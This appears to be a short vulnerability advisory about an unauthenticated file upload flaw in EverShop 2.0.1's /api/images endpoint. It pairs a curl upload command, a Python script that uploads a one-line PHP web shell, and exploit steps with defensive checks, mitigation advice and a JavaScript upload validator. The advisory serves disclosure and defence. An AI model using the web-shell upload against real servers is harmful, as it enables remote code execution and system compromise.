How the CVE Works:
The vulnerability resides in the `/api/images` endpoint of EverShop version 2.0.1. This API fails to perform any authentication checks, allowing completely unauthenticated users to access its file upload and directory creation functions. The endpoint does not adequately validate or sanitize user-supplied input, such as file names or directory paths. An attacker can send a crafted HTTP POST request containing malicious file data. The server blindly accepts this request, permitting the attacker to upload arbitrary files, including web shells with executable extensions like `.php` or `.jsp`, directly to the server’s filesystem. Additionally, the flaw allows for the creation of new directories, enabling an attacker to structure paths for their payloads. Successful exploitation grants the attacker the ability to execute arbitrary code on the host server with the same privileges as the EverShop application, leading to full system compromise.
DailyCVE Form:
Platform: EverShop
Version: 2.0.1
Vulnerability: File Upload Exploitation
Severity: Critical
Date: 12/02/2025
Prediction: Patch Expected 12/19/2025
What Undercode Say:
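```bash
# Unauthenticated multipart POST to the upload endpoint
curl -X POST http://<target>/api/images -F "[email protected]"

# List .php files modified more recently than the reference file /tmp/timestamp
find /path/to/evershop -name "*.php" -newer /tmp/timestamp -ls
```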
```python
import requests

url = "http://target/api/images"
files = {'file': ('backdoor.php', '<?php system($_GET["c"]); ?>')}
r = requests.post(url, files=files)
print(r.text)
```
How Exploit:
1. Identify target running EverShop 2.0.1.
2. Craft HTTP POST request to `/api/images`.
3. Upload a web shell file.
4. Access the uploaded shell to execute commands.
Protection from this CVE:
1. Apply vendor patch.
2. Implement strict authentication.
3. Validate file types/extensions.
4. Use web application firewall.
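Protection steps 2 and 3 combined into one server-side check, as an added example that is not EverShop's code or its patch: the request is authenticated first, then the directory, file name and content are each matched against an allowlist. The `session` object, the field names and the size limits are assumptions; JavaScript is used because EverShop is a Node.js application.

```javascript
// Added example, not EverShop code. All names here are hypothetical.
// Maps each allowed extension to the magic bytes its content must start with.
const IMAGE_TYPES = new Map([
  ["png", [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]],
  ["jpg", [0xff, 0xd8, 0xff]],
  ["jpeg", [0xff, 0xd8, 0xff]],
  ["gif", [0x47, 0x49, 0x46, 0x38]],
]);
// One directory level: no dots, slashes, backslashes or empty segments.
const SAFE_SEGMENT = /^[A-Za-z0-9_-]{1,64}$/;
// Base name plus exactly one extension, so "a.php.png" is rejected.
const SAFE_NAME = /^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$/;

function deny(status, reason) {
  return { ok: false, status, reason };
}

// Decides whether an upload may be written; performs no filesystem access itself.
function checkUpload({ session, destDir, fileName, bytes }) {
  // 1. Authenticate before any other processing.
  if (!session || session.authenticated !== true) {
    return deny(401, "authentication required");
  }
  // 2. Every directory segment must match the allowlist ("..", "" and "a\\b" fail).
  const segments = String(destDir).split("/");
  if (segments.length > 8 || !segments.every((s) => SAFE_SEGMENT.test(s))) {
    return deny(400, "invalid directory");
  }
  // 3. The extension must be on the image allowlist.
  const match = SAFE_NAME.exec(String(fileName));
  const magic = match ? IMAGE_TYPES.get(match[1].toLowerCase()) : undefined;
  if (!magic) {
    return deny(400, "file type not allowed");
  }
  // 4. The content must start with the signature of the claimed type.
  if (!(bytes instanceof Uint8Array) || bytes.length < magic.length ||
      !magic.every((b, i) => bytes[i] === b)) {
    return deny(400, "content does not match extension");
  }
  return { ok: true, status: 200, path: `${segments.join("/")}/${match[0]}` };
}
```

The returned `path` is relative; the handler would join it to a fixed upload root that the web server serves as static content only.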
Impact:
Remote Code Execution
System Compromise
Data Breach
Service Disruption
Sources:
Reported By: nvd.nist.gov

